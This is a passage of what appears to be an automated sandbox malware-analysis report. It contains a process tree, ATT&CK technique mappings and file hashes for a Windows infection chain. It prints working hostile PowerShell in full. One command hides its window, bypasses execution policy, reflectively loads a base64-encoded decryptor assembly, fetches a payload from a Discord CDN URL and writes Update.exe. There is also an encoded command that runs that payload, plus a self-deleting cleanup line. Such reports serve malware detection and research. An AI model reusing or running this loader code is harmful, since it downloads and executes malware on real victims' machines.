W1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAFJlc2l6ZQBFbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFN0cmluZwBIZWxwZXIuZGxsAFN5c3RlbQBmbgBTeXN0ZW0uUmVmbGVjdGlvbgBIZWxwZXIALmN0b3IAU3lzdGVtLkRpYWdub3N0aWNzAHJvdW5kcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBSZWFkQWxsQnl0ZXMAV3JpdGVBbGxCeXRlcwBHZXRCeXRlcwBieXRlcwBGb3JtYXQAT2JqZWN0AENvbnZlcnQAU3lzdGVtLlRleHQAQXJyYXkAa2V5AExpYnJhcnkARW1wdHkAAAAAANgSYNXASRJBgn6FJp2AZgkABCABAQgDIAABBSABARERBCABAQ4EIAEBAgQHAR0FBQABHQUOBhABAB0eAAMKARwGAAIODh0cBAAAElEFIAEdBQ4EAAEIDgYAAgEOHQUEAAEBDgQHAgoKCRABAgEQHR4ACAMKAQUIt3pcVhk04IkEAAAAAAcABAEODg4OCgADHQUQHQUdBQkIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAAFAEAD1Rlc3RDb25zb2xlQXBwMQAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAyMgAAKQEAJDM1QTg1QjRGLTI1MzUtNDJCMi1BODY4LUQ0RkIyQTA4N0ZDNAAADAEABzEuMC4wLjAAAE0BABwuTkVURnJhbWV3b3JrLFZlcnNpb249djQuNy4yAQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRQuTkVUIEZyYW1ld29yayA0LjcuMgAAAABDc+3iAAAAAAIAAABhAAAAXCgAAFwKAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAUlNEUzF5QvUjcQNImTBTIFdjK54BAAAARTpcQ3J5cHRzXC1cRk9SIE1FIE9OTFkgISAtIC0gUG9seURlY3J5cHQgRExMXG9ialx4NjRcUmVsZWFzZVxIZWxwZXIucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAACwDAAAAAAAAAAAAACwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsASMAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAABoAgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAASAAQAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAFQAZQBzAHQAQwBvAG4AcwBvAGwAZQBBAHAAcAAxAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAANgALAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABIAGUAbABwAGUAcgAuAGQAbABsAAAAAABIABIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAyADIAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAD4ACwABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABIAGUAbABwAGUAcgAuAGQAbABsAAAAAABAABAAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAFQAZQBzAHQAQwBvAG4AcwBvAGwAZQBBAHAAcAAxAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==')) | Out-Null; $f = 'C:\ProgramData\Update.exe';if (-not(Test-Path -Path $f -PathTy Leaf)){ try {$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvMTAxNTYxMzU4MjM4MzI1OTc1OC8xMDE4OTkyNzc3NTY2MDk3NTM4L2Vycm9yLmxvZy4x')); Invoke-WebRequest $s -Outfile 'C:\ProgramData\log';[Helper.Helper]::Library($f,'C:\ProgramData\log','HelloWorldHelloWorldHelloWorldHelloWorld','30');}catch{}}else{}
4⤵
- Suspicious use of WriteProcessMemory
PID:5040

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -v 4 -WindowStyle hidden -executionpolicy bypass -co "[Reflection.Assembly]::Load([Convert]::FromBase64String('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bWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAFJlc2l6ZQBFbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFN0cmluZwBIZWxwZXIuZGxsAFN5c3RlbQBmbgBTeXN0ZW0uUmVmbGVjdGlvbgBIZWxwZXIALmN0b3IAU3lzdGVtLkRpYWdub3N0aWNzAHJvdW5kcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBSZWFkQWxsQnl0ZXMAV3JpdGVBbGxCeXRlcwBHZXRCeXRlcwBieXRlcwBGb3JtYXQAT2JqZWN0AENvbnZlcnQAU3lzdGVtLlRleHQAQXJyYXkAa2V5AExpYnJhcnkARW1wdHkAAAAAANgSYNXASRJBgn6FJp2AZgkABCABAQgDIAABBSABARERBCABAQ4EIAEBAgQHAR0FBQABHQUOBhABAB0eAAMKARwGAAIODh0cBAAAElEFIAEdBQ4EAAEIDgYAAgEOHQUEAAEBDgQHAgoKCRABAgEQHR4ACAMKAQUIt3pcVhk04IkEAAAAAAcABAEODg4OCgADHQUQHQUdBQkIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAAFAEAD1Rlc3RDb25zb2xlQXBwMQAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAyMgAAKQEAJDM1QTg1QjRGLTI1MzUtNDJCMi1BODY4LUQ0RkIyQTA4N0ZDNAAADAEABzEuMC4wLjAAAE0BABwuTkVURnJhbWV3b3JrLFZlcnNpb249djQuNy4yAQBUDhRGcmFtZXdvcmtEaXNwbGF5TmFtZRQuTkVUIEZyYW1ld29yayA0LjcuMgAAAABDc+3iAAAAAAIAAABhAAAAXCgAAFwKAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAUlNEUzF5QvUjcQNImTBTIFdjK54BAAAARTpcQ3J5cHRzXC1cRk9SIE1FIE9OTFkgISAtIC0gUG9seURlY3J5cHQgRExMXG9ialx4NjRcUmVsZWFzZVxIZWxwZXIucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAACwDAAAAAAAAAAAAACwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsASMAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAABoAgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAASAAQAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAFQAZQBzAHQAQwBvAG4AcwBvAGwAZQBBAHAAcAAxAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAANgALAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABIAGUAbABwAGUAcgAuAGQAbABsAAAAAABIABIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAyADIAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAD4ACwABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABIAGUAbABwAGUAcgAuAGQAbABsAAAAAABAABAAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAFQAZQBzAHQAQwBvAG4AcwBvAGwAZQBBAHAAcAAxAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==')) | Out-Null; $f = 'C:\ProgramData\Update.exe';if (-not(Test-Path -Path $f -PathTy Leaf)){ try {$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvMTAxNTYxMzU4MjM4MzI1OTc1OC8xMDE4OTkyNzc3NTY2MDk3NTM4L2Vycm9yLmxvZy4x')); Invoke-WebRequest $s -Outfile 'C:\ProgramData\log';[Helper.Helper]::Library($f,'C:\ProgramData\log','HelloWorldHelloWorldHelloWorldHelloWorld','30');}catch{}}else{}
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -v 4 -WindowStyle hidden -executionpolicy bypass -encoded JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAMgAxAHMAZwA0AC4AbABvAGcAJwA7ACQAZABhACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZAA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAYQApACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAWwBDAC4AQwBsAGEAcwBzADEAXQA6ADoAUgB1AG4AKAApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABVAHAAZABhAHQAZQAuAGUAeABlACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGQA
4⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -v 4 -WindowStyle hidden -executionpolicy bypass -encoded JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAMgAxAHMAZwA0AC4AbABvAGcAJwA7ACQAZABhACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZAA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAYQApACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAWwBDAC4AQwBsAGEAcwBzADEAXQA6ADoAUgB1AG4AKAApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABVAHAAZABhAHQAZQAuAGUAeABlACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAGQA
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1268

C:\ProgramData\Update.exe
"C:\ProgramData\Update.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:2192

C:\Users\Admin\AppData\Local\Temp\b556d5b16e\orxds.exe
"C:\Users\Admin\AppData\Local\Temp\b556d5b16e\orxds.exe"
7⤵
- Executes dropped EXE
PID:2600

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exe"
4⤵
PID:2044

C:\Windows\system32\PING.EXE
ping 1.1.1.1 -n 1 -w 1000
5⤵
- Runs ping.exe
PID:3816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 912
2⤵
- Program crash
PID:3564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4808 -ip 4808
1⤵
PID:1284

C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
1⤵
- Executes dropped EXE
PID:228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 416
2⤵
- Program crash
PID:3468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 228 -ip 228
1⤵
PID:796

C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
1⤵
- Executes dropped EXE
PID:752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 416
2⤵
- Program crash
PID:3892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 752 -ip 752
1⤵
PID:1216

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\21sg4.log
Filesize
10KB

MD5
ac4358d2e39b42cfef2887b6766a63cb

SHA1
e66f73c0af090610597ffee61c5b292a703c42ed

SHA256
fb0bbdac464a97cbf25eca6ca8ae6aa422ba6945276bf34440b2a73b1e7118d5

SHA512
686afe3090cf89e29900a7520885c61093eac0489c0b2bce98dff4f09f88fae57dbfafb174ec6d42a8613f75538bf1733b9efaff7cd0b79193ca1ddc7d64536d

Download Submit
C:\ProgramData\Update.exe
Filesize
218KB

MD5
9512d156c84429d1854ac514ed428f22

SHA1
7b92f647f9606c3574b0ffb7d35a9a877ad1e18e

SHA256
5e19869a01fa927d8cca4183f640e6ac75d28e99e4f9084d5b3bbd8b5341cef4

SHA512
79a70c383eb2604d4a1cc67665f766d1e5ea45eb1e9e571c7f7fa86748037343b800bd1bb96e65dea9ee7bf50e28984cbd1be257590befd7977814ec12513855

Download Submit
C:\ProgramData\Update.exe
Filesize
218KB

MD5
9512d156c84429d1854ac514ed428f22

SHA1
7b92f647f9606c3574b0ffb7d35a9a877ad1e18e

SHA256
5e19869a01fa927d8cca4183f640e6ac75d28e99e4f9084d5b3bbd8b5341cef4

SHA512
79a70c383eb2604d4a1cc67665f766d1e5ea45eb1e9e571c7f7fa86748037343b800bd1bb96e65dea9ee7bf50e28984cbd1be257590befd7977814ec12513855

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
a55804de6c5e4eab0462ff4ce48aa7ec

SHA1
a3575216f15738da14ba6f8ce927aa1d97c0b1fb

SHA256
3ce383be2760720f756cbe7f3dd60f891b46625de78e9f71d88e12d560743c73

SHA512
e0d47633028118e8c1b2cb51a0727bde84eba44f031bfb868ef23fa7d48ca2fb04c9d35fbbdc498101c3156be1adbee0297fc662ffe1831a9cee002e56e2d45e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
f3c942a891ec381179b84401ee770b4c

SHA1
8fba91a8ba93ea39fdccf1b2b3c09ea755fdb577

SHA256
9b871ad84265570aa0b3286115c527de9ad1fe1d37e768b12058cc95445d084c

SHA512
223b4b9a471142240ed7e42f88f505c4df5a451546a78cfdccafb8794ad2b184f2cf6e4d24a55fe1d8b7a075255fe230cfbec86638444d065c34f007c6218de0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000011001\linda5.exe
Filesize
1.5MB

MD5
a951b3225db1b2e79eb76f5403ee18eb

SHA1
cba2417769cb8172e7060e7c0e869a1a6a7ee0cc

SHA256
b8098889539906bd82516c8d6609847832f48fea7c85e3d2d468b5c7a20daa97

SHA512
cb4f63abe299a19be2a91876e4e50024999acf7938df1e1a53e1c88ed14b977fd132e2c4262948a44653879456ce70547bcbf152b85105eed93923079067ee4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000011001\linda5.exe
Filesize
1.5MB

MD5
a951b3225db1b2e79eb76f5403ee18eb

SHA1
cba2417769cb8172e7060e7c0e869a1a6a7ee0cc

SHA256
b8098889539906bd82516c8d6609847832f48fea7c85e3d2d468b5c7a20daa97

SHA512
cb4f63abe299a19be2a91876e4e50024999acf7938df1e1a53e1c88ed14b977fd132e2c4262948a44653879456ce70547bcbf152b85105eed93923079067ee4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000012001\wish.exe
Filesize
175KB

MD5
8b08fce2936c8363994dda1d6e9ddadf

SHA1
15cfdfe6e406c0e69d2e6261b898b97eed6f34e2

SHA256
3f665abde637a3c65e46e96daeb9aa15c8dda5e2ed2fee15048d4fa790e66991

SHA512
925ad9dbe1681a3494450978217c0dd98b637e681a9713280756908f444bef95cf9b9649aa80383561ec59b5951885901b16227e9853c1111a4271ab8e1d0b67

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000012001\wish.exe
Filesize
175KB

MD5
8b08fce2936c8363994dda1d6e9ddadf

SHA1
15cfdfe6e406c0e69d2e6261b898b97eed6f34e2

SHA256
3f665abde637a3c65e46e96daeb9aa15c8dda5e2ed2fee15048d4fa790e66991

SHA512
925ad9dbe1681a3494450978217c0dd98b637e681a9713280756908f444bef95cf9b9649aa80383561ec59b5951885901b16227e9853c1111a4271ab8e1d0b67

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000013001\build333333.exe
Filesize
2.9MB

MD5
c9c15c4061ab4de4cb7c473c2760f923

SHA1
e64cbcd186178d44a1e8584c417b7d865417be0b

SHA256
d8e22530aa884e9e742a102f9acb53a2727b749dac4489c72b37782e2ec6383e

SHA512
6fe139e6e5d7923b932938acfd32b041fb16dac5945c50ef81a5dd61563d0faf1ef1a97db28a9f23a40abfe2fe78f756477157a13b217f6cf199a5ec122ab367

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000013001\build333333.exe
Filesize
2.9MB

MD5
c9c15c4061ab4de4cb7c473c2760f923

SHA1
e64cbcd186178d44a1e8584c417b7d865417be0b

SHA256
d8e22530aa884e9e742a102f9acb53a2727b749dac4489c72b37782e2ec6383e

SHA512
6fe139e6e5d7923b932938acfd32b041fb16dac5945c50ef81a5dd61563d0faf1ef1a97db28a9f23a40abfe2fe78f756477157a13b217f6cf199a5ec122ab367

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exe
Filesize
252KB

MD5
b9a11bdb88d21c6bbd5b575c96548075

SHA1
c5096e8854febffcb65da55d2ee0b8ab6fc3c5e7

SHA256
234b2eb65c442967ece3d92c1eb1c9c42a4a5ae6ea7e445a0994b746f656d8e3

SHA512
35494ed5e5de8fbc76f5969c3e7473f43ac8ea5a027a8329607accf2668a8fb70e2e04019689e5bc10bb104abf3e5eea3aa11815a3cae8cb41f382288e9ef9a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exe
Filesize
252KB

MD5
b9a11bdb88d21c6bbd5b575c96548075

SHA1
c5096e8854febffcb65da55d2ee0b8ab6fc3c5e7

SHA256
234b2eb65c442967ece3d92c1eb1c9c42a4a5ae6ea7e445a0994b746f656d8e3

SHA512
35494ed5e5de8fbc76f5969c3e7473f43ac8ea5a027a8329607accf2668a8fb70e2e04019689e5bc10bb104abf3e5eea3aa11815a3cae8cb41f382288e9ef9a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
Filesize
332KB

MD5
31d0310cd3d6d5e2e7c51508c12b25dd

SHA1
c19664c55ede5d5411d348fae4832823b7085086

SHA256
880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6

SHA512
2015f457aa5daa7ce8460c954243184ec77187f1ad1d997167074f84a3d31b32bf55be08b0d6043f20ddee289e93809150cc0b966e277fa7d66fdb92d10b1c9c

